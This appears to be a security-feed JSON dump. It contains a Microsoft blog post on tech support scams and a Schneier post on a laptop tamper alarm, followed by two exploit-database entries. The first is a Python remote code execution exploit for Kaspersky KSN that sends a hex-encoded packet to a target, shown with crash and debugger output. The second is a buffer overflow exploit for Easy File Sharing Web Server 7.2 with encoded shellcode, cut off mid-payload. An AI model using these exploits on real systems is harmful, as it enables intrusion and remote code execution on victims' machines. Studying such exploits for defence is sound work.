"cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-20T17:28:45", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "_(Editors note: Erik Wahlstrom spoke about the far-reaching impact of tech support scams and the need for industry-wide cooperation in his RSA Conference 2018 talk Tech Scams: Its Time to Release the Hounds.)_\n\n \n\nSocial engineering attacks like [tech support scams](<https://www.microsoft.com/en-us/wdsi/threats/support-scams>) are so common because theyre so effective. Cybercriminals want to bilk users money. They can spend a great deal of time and energy attacking the security of a devicebrute-force passwords, develop custom and sophisticated malware, and hunt down vulnerabilities to exploit. Or they can save themselves the trouble and convince users to freely give up access to their devices and sensitive information.\n\nMicrosoft has built the most secure version of its platform in Windows 10. Core OS technologies like [virtualization-based security](<https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs>), [kernel-based mitigations](<https://cloudblogs.microsoft.com/microsoftsecure/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), and the [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) stack of security defenses make it much more difficult for exploits, malware, and other threats to infect devices. Every day, [machine learning](<https://cloudblogs.microsoft.com/microsoftsecure/2018/02/14/how-artificial-intelligence-stopped-an-emotet-outbreak/>) and artificial intelligence in Windows Defender ATP protect millions of devices from [malware outbreaks](<https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/>) and cyberattacks. In many cases, customers may not even know they were protected. [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s?ocid=cx-blog-mmpc>), a special configuration of Windows 10, takes this even further by only running apps from the Microsoft Store, effectively preventing the vast majority of attacks.\n\n**Protect yourself from tech support scams**\n\n * Note that Microsoft does not send unsolicited email messages or make unsolicited phone calls to request for personal or financial information, or fix your computer.\n * Remember, Microsoft will never proactively reach out to you to provide unsolicited PC or technical support. Any communication we have with you must be initiated by you.\n * Dont call the number in pop-ups. Microsofts error and warning messages never include a phone number. \n--- \n \nThe [Windows 10 security stack](<https://blogs.windows.com/business/2018/04/17/new-capabilities-of-windows-defender-atp-further-maximizing-the-effectiveness-and-robustness-of-endpoint-security/>) greatly increases the cost for attackers. Many cybercriminals instead choose to target the humans in front of the PCs. It can sometimes be easier to convince users to willingly share their passwords, account info, or to install hazardous apps onto their device than to develop malware and steal info unnoticed.\n\nScammers continue to capitalize on the proven effectiveness of social engineering to perpetrate tech support scams. These scams are designed to trick users into believing their devices are compromised or broken. They do this to scare or coerce victims into purchasing unnecessary support services.\n\nTo help protect customers from scammers, we continue to enhance [antivirus](<https://www.microsoft.com/en-us/windows/windows-defender?ocid=cx-blog-mmpc>), [email](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection?ocid=cx-blog-mmpc>), [URL blocking](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-smartscreen/windows-defender-smartscreen-overview>), and [browser security](<https://cloudblogs.microsoft.com/microsoftsecure/2017/10/23/making-microsoft-edge-the-most-secure-browser-with-windows-defender-application-guard/>) solutions. However, given the scale and complexity of tech support scams, how can the security industry at large work together to deal a major blow to this enduring threat?\n\n## Still a growing global problem\n\nIn 2017, Microsoft Customer Support Services received 153,000 reports from customers who encountered or fell victim to tech support scams, a 24% growth from the previous year. These reports came from 183 countries, indicating a global problem.\n\nApproximately 15% of these customers lost money in the scam, costing them on average between $200 and $400. In some cases, victims pay a lot more. In December 2017, Microsoft received a report of a scammer emptying a bank account of 89,000 during a tech support scam in the Netherlands.\n\n\n\nIn a 2016 [survey](<https://mscorpmedia.azureedge.net/mscorpmedia/2016/10/10.17-Methodology.pdf>) sponsored by Microsoft, two in three respondents reported experiencing some form of tech support scam in the previous 12 months, with nearly one in ten losing money.\n\nHowever, as with many social engineering attacks, its tricky to put an absolute number to the problem. The figures above represent reports to Microsoft. The problem is so much bigger, given that tech support scams target customers of various other devices, platforms, or software.\n\n## An organized cybercriminal enterprise\n\nTech support scams come in several forms, but they share a common attack plan:\n\nScammers initiate these social engineering attacks in many ways, including:\n\n * **Scam websites** that use various tactics including browser dialog traps, fake antivirus detecting fake threats, and fake full-screen error messages. Scammers lead potential victims to these websites through ads, search results, typosquatting and other fraudulent mechanisms.\n * **Email campaigns** that use phishing-like techniques to trick recipients into clicking URLs or opening malicious attachments\n * **Malware** thats installed on computers to make system changes and display fake error messages\n * **Unsolicited phone calls** (also known as **cold calls**), which are telemarketing calls from scammers that pretend to be from a vendors support team\n\nThe complete attack chain shows that these attacks lead to the same goal of getting customers in contact with a call center. Once connected, a fake technician (an experienced scammer) convinces the victim of a problem with their device. They often scare victims with urgent problems requiring immediate action. They instruct victims to install remote administration tools (RATs), which provide the scammers access to and control over the device.\n\n\n\nFrom this point on, scammers can make changes to the device or point out common non-critical errors, and present these as problems. For example, scammers are known to use Event Viewer to show errors or netstat to show connections to foreign IP addresses. The scammers then attempt to make the sale. With control of the device, scammers can make a compelling case about errors in the device and pressure the victim to pay.\n\n## An industry-wide problem requires industry-wide action\n\nThe tech support scam problem is far-reaching. Its impact spans various platforms, devices, software, services. Examples include:\n\n * Tech support scams targeting specific platforms like Windows, macOS, iOS, and Android\n * Tech support scam websites that imply a formal relationship or some sort of approval by well-known vendors\n * Fake malware detection from programs or websites that mimic various antivirus solutions\n * Customized tech support scams that tailor messages and techniques based on geography, OS, browser, or ISP\n\nAs in many forms of social engineering attacks, customer education is key. There _are_ tell-tale signs: normal error and warning messages should not have phone numbers, most vendors dont make unsolicited phone calls to fix a device, etc. To help protect and educate Microsoft customers, we have published [blogs](<https://cloudblogs.microsoft.com/microsoftsecure/tag/tech-support-scam/>), [websites](<https://www.microsoft.com/en-us/wdsi/threats/support-scams>), [videos](<https://www.youtube.com/watch?v=IzYk-y-0raE>), and [social media](<https://twitter.com/wdsecurity>) campaigns on the latest tech support scam trends and tactics. We have also empowered customers to [report tech support scams](<https://www.microsoft.com/reportascam>).\n\nBeyond customer education, the scale and complexity of tech support scams require cooperation and broad partnerships across the industry. The Microsoft Digital Crimes Unit (DCU) works with law enforcement and other agencies to [crack down on scammers](<https://blogs.microsoft.com/ai/microsoft-used-ai-help-crack-tech-support-scams-worldwide/>).\n\nWe have further built partnerships across the ecosystem to make a significant dent on this issue:\n\n * Web hosting providers, which can take down verified tech support scam websites\n * Telecom networks, which can block tech support scam phone numbers\n * Browser developers, who can continuously thwart tech support scam tactics and block tech support scam websites\n * Antivirus solutions, which can detect tech support scam malware\n * Financial networks, who can help protects customers from fraudulent transactions\n * Law enforcement agencies, who can go after the crooks\n\nWe seek to continue expanding and enriching these partnerships. While we continue to help protect customers through a hardened platform and increasingly better security solutions, we believe its high time for the industry to come together and put an end to the tech support scam problem. Together, we can make our customers lives easier and safer.\n\n \n\n \n\n**_Erik Wahlstrom_** \n_Windows Defender Research Project Manager_\n\n \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).", "reporter": "Windows Defender ATP", "published": "2018-04-20T17:00:23", "type": "mssecure", "title": "Teaming up in the war on tech support scams", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-20T17:00:23", "id": "MSSECURE:363AAF37C44886432CAD4640BFF63B64", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/20/teaming-up-in-the-war-on-tech-support-scams/", "cvss": {"score": 0.0, "vector": "NONE"}}], "schneier": [{"lastseen": "2018-04-25T14:39:48", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "\"[Do Not Disturb](<https://objective-see.com/products/dnd.html>)\" is a Macintosh app that send an alert when the lid is opened. The idea is to detect computer tampering.\n\nWired [article](<https://www.wired.com/story/do-not-disturb-app-macbook-evil-maid-attacks/>):\n\n> Do Not Disturb goes a step further than just the push notification. Using the Do Not Disturb iOS app, a notified user can send themselves a picture snapped with the laptop's webcam to catch the perpetrator in the act, or they can shut down the computer remotely. The app can also be configured to take more custom actions like sending an email, recording screen activity, and keeping logs of commands executed on the machine. \n\nCan someone please make one of these for Windows?", "reporter": "Bruce Schneier", "published": "2018-04-24T11:04:45", "type": "schneier", "title": "Computer Alarm that Triggers When Lid Is Opened", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-25T09:31:32", "id": "SCHNEIER:DA64CEDF3297A3D9505B61FE1F2E6A73", "href": "https://www.schneier.com/blog/archives/2018/04/computer_alarm_.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-24T13:22:40", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "Juan Sacco", "published": "2018-04-24T00:00:00", "title": "Kaspersky KSN Remote Code Execution Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-04-24T00:00:00", "id": "1337DAY-ID-30231", "href": "https://0day.today/exploit/description/30231", "sourceData": "# Exploit Author: Juan Sacco <[email\u00a0protected]> - http://exploitpack.com\r\n# Vulnerability found using Exploit Pack v10\r\n# CVE: NotYet\r\n#\r\n# Exploit description:\r\n# Kaspersky KSN is prone to a remote memory corruption because it\r\nfails to properly filter the input on the remote subscribers, this\r\nleads to heap segments overwrite\r\n# and it leads to remote code execution.\r\n#\r\n#\r\n# Program description:\r\n# Kaspersky KSN for Linux enables cloud-assisted, multi-layered\r\nsecurity for servers and workstations running the Linux operating\r\nsystem. It delivers reliable protection with minimal impact on\r\n# performance.\r\n# Product homepage: http://kaspersky.com\r\n#\r\n# Example usage: python kasperky.py 192.168.1.1 6349\r\n#\r\n# Exploit history:\r\n# Discovered: Feb 2018\r\n# Reported to Kaspersky: Feb 2018\r\n# Fixed by Kaspersky: March 2018\r\n#\r\n# [!] Valgrind output:\r\n#\r\n# =3314== Invalid write of size 4\r\n# ==3314== at 0x24FA74:\r\nRespObject::SetSimpleString(std::__cxx11::basic_string<char,\r\nstd::char_traits<char>, std::allocator<char> > const&) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,\r\nunsigned long, std::function<void (RespObject const&)>) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x23B740:\r\nSession<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> >\r\n>::HandleRead(boost::system::error_code const&, unsigned long) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x22FF56:\r\nboost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,\r\nboost::_bi::bind_t<void, boost::_mfi::mf2<void,\r\nSession<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> > >,\r\nboost::system::error_code const&, unsigned long>,\r\nboost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,\r\nboost::arg<1> (*)(), boost::arg<2> (*)()> >\r\n>::do_complete(boost::asio::detail::task_io_service*,\r\nboost::asio::detail::task_io_service_operation*,\r\nboost::system::error_code const&, unsigned long) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x23647C:\r\nboost::asio::detail::task_io_service::run(boost::system::error_code&)\r\n(in /usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== Address 0x0 is not stack'd, malloc'd or (recently) free'd\r\n# ==3314==\r\n# ==3314==\r\n# ==3314== Process terminating with default action of signal 11\r\n(SIGSEGV): dumping core\r\n# ==3314== Access not within mapped region at address 0x0\r\n# ==3314== at 0x24FA74:\r\nRespObject::SetSimpleString(std::__cxx11::basic_string<char,\r\nstd::char_traits<char>, std::allocator<char> > const&) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x241814: RequestParser::Parse(unsigned char*,\r\nunsigned long, std::function<void (RespObject const&)>) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x23B740:\r\nSession<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> >\r\n>::HandleRead(boost::system::error_code const&, unsigned long) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x22FF56:\r\nboost::asio::detail::reactive_socket_recv_op<boost::asio::mutable_buffers_1,\r\nboost::_bi::bind_t<void, boost::_mfi::mf2<void,\r\nSession<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> > >,\r\nboost::system::error_code const&, unsigned long>,\r\nboost::_bi::list3<boost::_bi::value<Session<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> > >*>,\r\nboost::arg<1> (*)(), boost::arg<2> (*)()> >\r\n>::do_complete(boost::asio::detail::task_io_service*,\r\nboost::asio::detail::task_io_service_operation*,\r\nboost::system::error_code const&, unsigned long) (in\r\n/usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x23647C:\r\nboost::asio::detail::task_io_service::run(boost::system::error_code&)\r\n(in /usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== by 0x1E978A: main (in /usr/local/ksn/bin/rocksdb-server)\r\n# ==3314== If you believe this happened as a result of a stack\r\n# ==3314== overflow in your program's main thread (unlikely but\r\n# ==3314== possible), you can try to increase the size of the\r\n# ==3314== main thread stack using the --main-stacksize= flag.\r\n# ==3314== The main thread stack size used in this run was 8388608.\r\n# ==3314==\r\n# ==3314== HEAP SUMMARY:\r\n# ==3314== in use at exit: 769,426 bytes in 7,522 blocks\r\n# ==3314== total heap usage: 15,342 allocs, 7,820 frees, 1,354,534\r\nbytes allocated\r\n# ==3314==\r\n# ==3314== LEAK SUMMARY:\r\n# ==3314== definitely lost: 8 bytes in 1 blocks\r\n# ==3314== indirectly lost: 0 bytes in 0 blocks\r\n# ==3314== possibly lost: 5,328 bytes in 9 blocks\r\n# ==3314== still reachable: 764,090 bytes in 7,512 blocks\r\n# ==3314== of which reachable via heuristic:\r\n# ==3314== newarray : 8,264 bytes in 4 blocks\r\n# ==3314== suppressed: 0 bytes in 0 blocks\r\n#\r\n# [!] Debugger output:\r\n#\r\n# [----------------------------------registers-----------------------------------]\r\n# RAX: 0x7ffe127426f0 --> 0x7ffe12742800 --> 0x7f7ee28fb1c0 -->\r\n0x7f7ee1d4f090 --> 0x7f7ee1894760\r\n(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)\r\n# RBX: 0x0\r\n# RCX: 0x7f7ee2913000 --> 0x0\r\n# RDX: 0xffffffffffdf6bf0\r\n# RSI: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->\r\n0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760\r\n(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)\r\n# RDI: 0x0\r\n# RBP: 0x7f7ee28f5338 --> 0x81\r\n# RSP: 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5\r\n# RIP: 0x7f7ee18b3a74\r\n(<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:\r\n mov DWORD PTR [rdi],0x1)\r\n# R8 : 0x0\r\n# R9 : 0x7\r\n# R10: 0x2\r\n# R11: 0x7f7ee00276d0 --> 0xfffcdfc0fffcd800\r\n# R12: 0x29b\r\n# R13: 0x0\r\n# R14: 0x7ffe127426e0 --> 0x7ffe127426f0 --> 0x7ffe12742800 -->\r\n0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 --> 0x7f7ee1894760\r\n(<_ZN5boost4asio6detail15task_io_serviceD2Ev>: push r13)\r\n# R15: 0x7f7ee2924562 --> 0x543ffb3c7ef1cd2b\r\n# EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT\r\ndirection overflow)\r\n# [-------------------------------------code-------------------------------------]\r\n# 0x7f7ee18b3a6e: xchg ax,ax\r\n# 0x7f7ee18b3a70\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE>:\r\n push rbx\r\n# 0x7f7ee18b3a71\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+1>:\r\n mov rbx,rdi\r\n# => 0x7f7ee18b3a74\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+4>:\r\n mov DWORD PTR [rdi],0x1\r\n# 0x7f7ee18b3a7a\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+10>:\r\nlea rdi,[rdi+0x10]\r\n# 0x7f7ee18b3a7e\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+14>:\r\ncall 0x7f7ee184a8a0\r\n<_ZNSt7[email\u00a0protected]plt>\r\n# 0x7f7ee18b3a83\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+19>:\r\nmov BYTE PTR [rbx+0x4],0x0\r\n# 0x7f7ee18b3a87\r\n<_ZN10RespObject15SetSimpleStringERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE+23>:\r\npop rbx\r\n# [------------------------------------stack-------------------------------------]\r\n# 0000| 0x7ffe127425c0 --> 0x7f7ee2924198 --> 0x7f7ee28f5320 --> 0x5\r\n# 0008| 0x7ffe127425c8 --> 0x7f7ee18a5815\r\n(<_ZN13RequestParser5ParseEPhmSt8functionIFvRK10RespObjectEE+3317>:\r\n mov rdi,QWORD PTR [rsp+0x110])\r\n# 0016| 0x7ffe127425d0 --> 0x7f7ee2901c08 --> 0x5a849d1562a512bd\r\n# 0024| 0x7ffe127425d8 --> 0x7f7ee29242c8 --> 0x10061030045\r\n# 0032| 0x7ffe127425e0 --> 0x361\r\n# 0040| 0x7ffe127425e8 --> 0x0\r\n# 0048| 0x7ffe127425f0 --> 0x7ffe127426e0 --> 0x7ffe127426f0 -->\r\n0x7ffe12742800 --> 0x7f7ee28fb1c0 --> 0x7f7ee1d4f090 (--> ...)\r\n# 0056| 0x7ffe127425f8 --> 0x7ffe127426a0 --> 0x0\r\n# [------------------------------------------------------------------------------]\r\n# Legend: code, data, rodata, value\r\n# Stopped reason: SIGSEGV\r\n# 0x00007f7ee18b3a74 in\r\nRespObject::SetSimpleString(std::__cxx11::basic_string<char,\r\nstd::char_traits<char>, std::allocator<char> > const&) ()\r\n# gdb-peda$ where\r\n# #0 0x00007f7ee18b3a74 in\r\nRespObject::SetSimpleString(std::__cxx11::basic_string<char,\r\nstd::char_traits<char>, std::allocator<char> > const&) ()\r\n# #1 0x00007f7ee18a5815 in RequestParser::Parse(unsigned char*,\r\nunsigned long, std::function<void (RespObject const&)>) ()\r\n# #2 0x00007f7ee189f741 in\r\nSession<boost::asio::basic_stream_socket<boost::asio::ip::tcp,\r\nboost::asio::stream_socket_service<boost::asio::ip::tcp> >\r\n>::HandleRead(boost::system::error_code const&, unsigned long\r\n\r\nimport binascii\r\nimport sys\r\nimport socket\r\nimport time\r\n\r\ndef rocksDB(target,port):\r\n try:\r\n while 1:\r\n # Open socket\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n # Set reuse ON\r\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n # Bind port\r\n s.connect((target, port))\r\n print(\"[\" + time.strftime('%a %H:%M:%S') + \"]\" + \" - \" +\r\n\"Connected to:\"), target, port\r\n print(\"[\" + time.strftime('%a %H:%M:%S') + \"]\" + \" - \" +\r\n\"Establishing connection.. \")\r\n packet =\r\nbinascii.unhexlify(b'4500036100010000400679947f0000017f000001001419100000000000000000500220009e1700005ce528736b32895950f96218411ca66c9b0842c995eacbfc3eacd8187d3aa8488e1cf1f18491606b9c400c42ec88e7399baa7c3b0bca43de853c74d2fbb2c08c9868ad9688b815d6e5a913937ff05217e18ff28d379fa6985204f7f529990a675d2fc70e1a7dbca8334e4faf30ea31cb33f0c1fabbfc92fbaf20d7e63cfe65ee95711a80a406c26b6e60335d74a02b42a454bc6bbcf5153cb20b77c9686b2fff994b224a3dc5fcbd12a562159d845a8b039abf971bb7c79fe74ca7055560c9c513377881b7a033eb797738fc119758f4c6ea1a960cab1299f5b1a6e99e0be889d8bdf05edc7ca6f14a48d35a5f747887e2330a5cc8b722257ecf32987ad1e24aa56c4685fdae028ca7689bdb66b3d951b8021a34a04114f4208c3f9a6d66bcb7cbeec80a716d69375a88202f3cac2562c9595095c61e693080edd5a3318084d974a2130d5cfe439903d6d5b9b3b553143831c6e01f286da4a2339c91cfce00fe17d7584153ab93e723ce2e859d7aaa9f9574af2dbb4ca4d9f8c8f39f4e89a790e5e4e74bbfd44a721594362f1c71cc48721014f451b837aff64624ea8fbc767c50ada655f23c87195b49b854c3e0d69f1585b663a02ad33cfdfd78c43e3531d6802b7271b7518ded3d93338084ca0e7982dc7c76d82c1b0fed91e5dc567262f46e3bd71b66f9d8283784d666a2be99e397a4abe9495168c880d7f371b87f44b38e61d836ccad8afc8c99518fa1240ab5a2a0685a9d450f4b44fefcc6b64ce8f6ec836922670b31ebf62ea5933e272a62ac8ff2c79d8f15a1220a37e5535ec0998aaf8af2f9d0a0f75e96fad8e8b1ae0e2fff70d831c501048644f700527d61d1f6cb177948e0ebea8d4a01fa9c7ca2c4b3472bcdf17e3cfb3f54fb791a43f114514b6821390d2c16e23ff9ffb0b0caa508b2952b0a497a24ce0d8ad05734111034a71d57a624855b95594b7f158903f03c02213c8de27644a2026de0c7477f1550f9f39450718ddf185eb9c5f9fc7b545c838970c4f7e87b69c570a873d8f64fe08ed23c7b8275f8bf54f080508bb244fbf3dc852968bd8a63a8787c8e496508c597ae9f617bfb096bebf94cbb736a6438163f61479816da9d88e2a3ea6b50a828d9c2c6f51f34e29f4fe588a41e5e3a53515d474a5a52b357')\r\n # Log the packet in hexa and timestamp\r\n fileLog = target + \".log\"\r\n logPacket = open(\"exploit.log\", \"w+\")\r\n logPacket.write(\"[\"+time.strftime('%a %H:%M:%S')+\"]\"+ \" -\r\nWriting to socket: \" + binascii.hexlify(bytes(packet))+\"\\n\")\r\n logPacket.close()\r\n\r\n # Write bytecodes to socket\r\n print(\"[\"+time.strftime('%a %H:%M:%S')+\"]\"+\" - \"+\"Writing\r\nto socket: \")\r\n s.send(bytes(packet))\r\n # Packet sent:\r\n print(bytes(packet))\r\n try:\r\n data = s.recv(4096)\r\n print(\"[\" + time.strftime('%a %H:%M:%S') + \"]\" + \" -\r\n\"+ \"Data received: '{msg}'\".format(msg=data))\r\n except socket.error, e:\r\n print '[!] Sorry, No data available'\r\n continue\r\n s.close()\r\n except socket.error as error:\r\n print error\r\n print \"Sorry, something went wrong!\"\r\n\r\ndef howtouse():\r\n print \"Usage: kaspersky.py hostname port\"\r\n print \"[*] Mandatory arguments:\"\r\n print \"[-] Specify a hostname / port\"\r\n sys.exit(-1)\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n # Set target\r\n target = sys.argv[1]\r\n port = int(sys.argv[2])\r\n\r\n print \"[*] Kaspersky KSN RCE Exploit by Juan Sacco\r\n<[email\u00a0protected] \"\r\n rocksDB(target, port)\r\n except IndexError:\r\n howtouse()\n\n# 0day.today [2018-04-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30231"}, {"lastseen": "2018-04-26T00:05:20", "references": [], "description": "Exploit for windows platform in category remote exploits", "edition": 1, "reporter": "Hashim Jawad", "published": "2018-04-24T00:00:00", "title": "Easy File Sharing Web Server 7.2 - UserID Remote Buffer Overflow (DEP Bypass) Exploit", "type": "zdt", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9059"], "modified": "2018-04-24T00:00:00", "id": "1337DAY-ID-30243", "href": "https://0day.today/exploit/description/30243", "sourceData": "#!/usr/bin/env python\r\n#---------------------------------------------------------------------------------------------------#\r\n# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #\r\n# Date : 04/24/2018 #\r\n# Exploit Author : Hashim Jawad #\r\n# Twitter : @ihack4falafel #\r\n# Author Website : ihack4falafel[.]com #\r\n# Vendor Homepage : http://www.sharing-file.com/ #\r\n# Software Link : http://www.sharing-file.com/efssetup.exe #\r\n# Original Exploit: https://www.exploit-db.com/exploits/44485/ #\r\n# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 # \r\n#---------------------------------------------------------------------------------------------------#\r\n\r\nimport requests\r\nimport struct\r\nimport time\r\n\r\nhost='192.168.80.148'\r\nport='80'\r\n\r\n# badchars = \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\"\r\n# [email\u00a0protected]:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python\r\n# Payload size: 447 bytes\r\n\r\nshellcode = \"\"\r\nshellcode += \"\\x89\\xe3\\xd9\\xe5\\xd9\\x73\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\"\r\nshellcode += \"\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\"\r\nshellcode += \"\\x43\\x37\\x52\\x59\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\"\r\nshellcode += \"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\"\r\nshellcode += \"\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x49\"\r\nshellcode += \"\\x6c\\x6b\\x58\\x4e\\x62\\x63\\x30\\x57\\x70\\x77\\x70\\x53\"\r\nshellcode += \"\\x50\\x6e\\x69\\x6b\\x55\\x64\\x71\\x39\\x50\\x50\\x64\\x6e\"\r\nshellcode += \"\\x6b\\x42\\x70\\x64\\x70\\x6c\\x4b\\x43\\x62\\x36\\x6c\\x6e\"\r\nshellcode += \"\\x6b\\x43\\x62\\x75\\x44\\x6e\\x6b\\x52\\x52\\x64\\x68\\x46\"\r\nshellcode += \"\\x6f\\x38\\x37\\x50\\x4a\\x76\\x46\\x64\\x71\\x4b\\x4f\\x4e\"\r\nshellcode += \"\\x4c\\x77\\x4c\\x35\\x31\\x61\\x6c\\x77\\x72\\x76\\x4c\\x37\"\r\nshellcode += \"\\x50\\x4a\\x61\\x5a\\x6f\\x74\\x4d\\x37\\x71\\x39\\x57\\x38\"\r\nshellcode += \"\\x62\\x5a\\x52\\x30\\x52\\x66\\x37\\x6e\\x6b\\x50\\x52\\x62\"\r\nshellcode += \"\\x30\\x6c\\x4b\\x62\\x6a\\x57\\x4c\\x6c\\x4b\\x52\\x6c\\x47\"\r\nshellcode += \"\\x61\\x74\\x38\\x6d\\x33\\x71\\x58\\x43\\x31\\x38\\x51\\x50\"\r\nshellcode += \"\\x51\\x6c\\x4b\\x33\\x69\\x67\\x50\\x35\\x51\\x48\\x53\\x6e\"\r\nshellcode += \"\\x6b\\x57\\x39\\x75\\x48\\x69\\x73\\x54\\x7a\\x63\\x79\\x4e\"\r\nshellcode += \"\\x6b\\x35\\x64\\x6c\\x4b\\x35\\x51\\x6a\\x76\\x46\\x51\\x39\"\r\nshellcode += \"\\x6f\\x6e\\x4c\\x6f\\x31\\x48\\x4f\\x44\\x4d\\x36\\x61\\x48\"\r\nshellcode += \"\\x47\\x34\\x78\\x6b\\x50\\x74\\x35\\x69\\x66\\x73\\x33\\x73\"\r\nshellcode += \"\\x4d\\x49\\x68\\x55\\x6b\\x43\\x4d\\x47\\x54\\x74\\x35\\x68\"\r\nshellcode += \"\\x64\\x63\\x68\\x4e\\x6b\\x46\\x38\\x66\\x44\\x33\\x31\\x59\"\r\nshellcode += \"\\x43\\x61\\x76\\x6c\\x4b\\x66\\x6c\\x50\\x4b\\x4c\\x4b\\x50\"\r\nshellcode += \"\\x58\\x47\\x6c\\x65\\x51\\x69\\x43\\x6c\\x4b\\x63\\x34\\x6e\"\r\nshellcode += \"\\x6b\\x43\\x31\\x68\\x50\\x4e\\x69\\x61\\x54\\x65\\x74\\x65\"\r\nshellcode += \"\\x74\\x51\\x4b\\x51\\x4b\\x73\\x51\\x73\\x69\\x62\\x7a\\x42\"\r\nshellcode += \"\\x71\\x69\\x6f\\x39\\x70\\x51\\x4f\\x73\\x6f\\x43\\x6a\\x4e\"\r\nshellcode += \"\\x6b\\x52\\x32\\x78\\x6b\\x4e\\x6d\\x31\\x4d\\x53\\x5a\\x67\"\r\nshellcode += \"\\x71\\x6c\\x4d\\x4f\\x75\\x48\\x32\\x57\\x70\\x77\\x70\\x43\"\r\nshellcode += \"\\x30\\x66\\x30\\x61\\x78\\x46\\x51\\x6e\\x6b\\x70\\x6f\\x6e\"\r\nshellcode 